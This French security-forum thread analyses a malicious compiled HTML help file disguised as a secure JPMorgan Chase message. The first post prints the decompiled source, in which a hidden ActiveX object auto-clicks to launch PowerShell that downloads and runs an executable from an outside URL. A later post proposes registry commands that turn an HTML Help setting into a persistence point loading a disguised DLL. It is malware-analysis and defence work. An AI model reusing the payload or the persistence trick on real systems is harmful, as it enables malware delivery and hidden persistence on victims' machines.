CHM malveillants: HTML compilés + ActiveX + PowerShell

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

CHM malveillants: HTML compilés + ActiveX + PowerShell

Message par ѠOOT » 28 avr. 2015 23:03

Bonjour,

Dans la continuité des sujets précédents ( Documents XLS malveillants : macros-commandes VBA+PowerShell & XLS/DOC malveillants : analyser les flux de documents OLE ). Aujourd'hui, j'ai sélectionné cet échantillon détecté génériquement par l'antivirus Avast! comme étant HTML:Runner-S. Il s'agit d'un fichier d'aide HTML compilé nommé "SecureMessage.chm". ( .CHM : compressed HTML )

Pour extraire les ressources du fichier CHM, j'utilise l'argument "decompile" de l'interface d'aide, l'utilitaire Microsoft® HTML Help Executable situé à l'emplacement "%WINDIR%\hh.exe".

hh -decompile c: SecureMessage.chm

Un fichier HTML nommé "SecureMessage.htm" apparait dans le lecteur C:
L'utilitaire htm2chm v3.0.9.3 a été utilisé pour générer le CHM à partir du fichier HTML initial.

La page qui s'intitule "Secure Message" tente de convaincre la future victime qu'il s'agit d'un courriel sécurisé émanant de "JPMorgan Chase". "This is a secure, encrypted message." & "This message is currently encrypted , please do not close any windows during decrypting." Que se passe t'il réellement pendant ce laps de temps ?

En affichant la source,
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1"
value="
,cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('http://selkirkconed.com/wp-content/uplo ... New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla2.exe')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<script>
x.Click();
</SCRIPT>


Le JavaScript effectuera l'action "Click" sur l'objet "x". L'objet "x", d'une taille de 1 pixel sera quasi-invisible. Son CLSID "adb880a6-d8ff-11cf-9377-00aa003b7a11" indique le GUID de la classe d'un objet OLE qui n'est autre que "HHCtrl Object" c'est à dire "Microsoft® HTML Help Control" situé à l'emplacement "%WINDIR%\System32\hhctrl.ocx" (OCX signifie OLE Control eXtension). Cette pratique permet, via les paramètres, de piloter l'interface d'aide dans le but d'exécuter du code arbitraire. L'interpréteur de commandes "cmd.exe" va exécuter la commande "PowerShell" avec des arguments. La commandelette "New-Object" de Windows PowerShell est utilisée pour créer et utiliser la méthode WebClient.DownloadFile pour récupérer un exécutable situé à l'URL mentionnée qui sera ensuite exécuté → GAME OVER

Le 28 avril 2015 à 15:30:52 (CET) ce programme malveillant téléchargé était détecté à 0% au moment de l'analyse sur Jotti. À 16:01:10 UTC, seuls 3 / 54 moteur antivirus sur VirusTotal.

Avec l'apparence d'un faux message sécurisé & chiffré de JPMorgan Chase, l'utilisateur se dira qu'il s'agissait probablement d'une erreur ou d'une sorte de tentative d'hameçonnage ratée. Mais détrompez-vous, il n'en est rien. Les codes JavaScript couplés aux usages d'ActiveX dans le contexte des traitements de fichiers d'aides HTML compilés sont loin d'être une nouveauté ; l'introduction de PowerShell contraste par son absence de cohérence avec le reste d'un genre plutôt old-school.. mais malheureusement pour les victimes, ça fonctionne.

edit: Ajouts de liens connexes:
➱ ( 7 May 2015 ) ❴ Microsoft Help File Malware Targets JPMorgan Chase Customers
➱ ( 29 June 2015 ) ❴ MERS News Used in Targeted Attack against Japanese Media Company - ZXShell
Dernière édition par ѠOOT le 30 juin 2015 00:32, édité 3 fois.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

lab34
newbie
newbie
Messages : 40
Inscription : 02 févr. 2012 12:07

Re: CHM malveillants: HTML compilés + ActiveX + PowerShell

Message par lab34 » 29 avr. 2015 16:53

Bonjour,
merci, c'est très intéressant.

Est ce que l'UAC n'alerte pas quand l'exe est lancé par le powershell ?

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: CHM malveillants: HTML compilés + ActiveX + PowerShell

Message par ѠOOT » 30 avr. 2015 10:13

Bonjour,

Bonne question. Je n'ai pas eu le temps libre nécessaire pour évaluer davantage la situation mais si l'occasion se présente je testerai. Si tu prends l'initiative de tester, merci de nous informer des résultats obtenus. Les habituels killbits sont inopérants dans ce contexte. Et un simple utilisateur a malheureusement la possibilité d'ouvrir ce type de documents piégés. On l'a déjà observé sur les documents piégés Word & Excel, un attaquant pourrait très bien sophistiquer légèrement et scénariser le tout avec une pointe d'ingénierie sociale dans le but d'abaisser le niveau de sécurité et/ou la vigilance de l'utilisateur. Donc UAC ou non (Invoke-BypassUAC) un doute pourra s'installer. De ce fait, il est plutôt conseillé de miser sur la mise en œuvre de mesures sécuritaires en amont d'une possible "catastrophe" et éventuellement détecter en temps réel la présence de celle-ci, le cas échéant. Pour y parvenir, un simple système de prévention d'intrusion type IDS/IPS tels que Snort, Suricata, ETPro Ruleset,.. pour un particulier qui possède une ou deux stations de travail c'est un peu excessif mais pas pour un réseau de machines en entreprise. Les mises à jour des signatures sont alimentées régulièrement grâce à une communauté active et éventuellement il est toujours possible de générer vos propres règles dans l'urgence afin de prévenir et/ou contenir une menace. D'ailleurs la mise à jour du 27 avril 2015, date à laquelle j'ai constaté une montée en volume du programme malveillant téléchargé ( Stoberox / Zlader / Mazahaka / .. ces nominations dépendent de l'éditeur de l'antivirus ) par ces CHM piégés. On constate aussi des améliorations de signatures concernant les dernières évolutions de la famille Dridex.

2021013 - ET TROJAN Likely Dridex Generic SSL Cert (trojan.rules)
2810814 - ETPRO TROJAN Win32/Zlader.H Checkin (trojan.rules)

À noter que les Dridex & ( Stoberox | Zlader | Mazahaka ) ne sont pas à prendre à la légère, ces programmes malveillants sont spécialisés dans les vols d'identifiants et de données bancaires.

edit: Ajouts de liens connexes.
➱ ( March 4, 2015 ) ❴ Dridex Attacks Target Corporate Accounting
➱ ( April 6, 2015 ) ❴ Spam Served With a Side of Dridex
Dernière édition par ѠOOT le 06 mai 2015 23:02, édité 1 fois.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

lab34
newbie
newbie
Messages : 40
Inscription : 02 févr. 2012 12:07

Re: CHM malveillants: HTML compilés + ActiveX + PowerShell

Message par lab34 » 30 avr. 2015 10:36

Bonjour, merci,
effectivement, dés hier 11h, virustotal détectait à 27/56

Quand j'ai vu cela, ça m'a fait penser qu'il ne faut pas trop réduire la fréquence de mise à jour des signatures sur les antivirus. Il faut que je vérifie, mais je crois que j'avais réduit à une par jour sur un PC qui est très utilisé pour le jeu en ligne (les maj provoquent des lags ! ;-) )

Et bien sûr, prévention, ne pas cliquer sur n'importe quoi...

Avatar de l’utilisateur
ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 20:39

Re: CHM malveillants: HTML compilés + ActiveX + PowerShell

Message par ѠOOT » 04 mai 2015 12:47

Bonjour,

En regardant plus près, j'ai observé qu'une restriction d'HH s'avère particulièrement intéressante.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\HTMLHelp\1.x\HHRestrictions]
"SafeModeDetectionSetting"=dword:00000001


SafeModeDetectionSetting va limiter les risques face aux dangers précités.
Je n'ai pas trouvé de référence officielle à cette option mais ça dépanne.

Pendant que j'avais le nez dedans j'ai constaté diverses choses assez originales.
À chaque instance d'HH, il y a un appel systématique à l'emplacement "Location".
Comme c'est en HKCU, même un compte utilisateur limité a les droits d'écritures.

REG ADD "HKCU\Software\Microsoft\HTMLHelp Author" /v Location /t REG_SZ /d "%tmp%\crochetage.dll"

Ici l'emplacement est local mais rien n'empêche de spécifier un emplacement distant de type UNC donc sur un chemin réseau vers une librairie déguisée, par exemple en "compta.xls". Ça pourrait picoter avec des relations particulières de confiance pré-établies depuis des lustres entre les machines ; c'est souvent le cas :\

REG ADD "HKCU\Software\Microsoft\HTMLHelp Author" /v Location /t REG_SZ /d "\\SERVEUR\Public\compta.xls"

Certes ça mérite quelques ajustements mais on a vu des attaques réussies pour moins que ça.
À mes yeux je considère cet emplacement comme un point de chargement persistant potentiel.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

Répondre

Revenir vers « Tech, Tips & Tricks »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 2 invités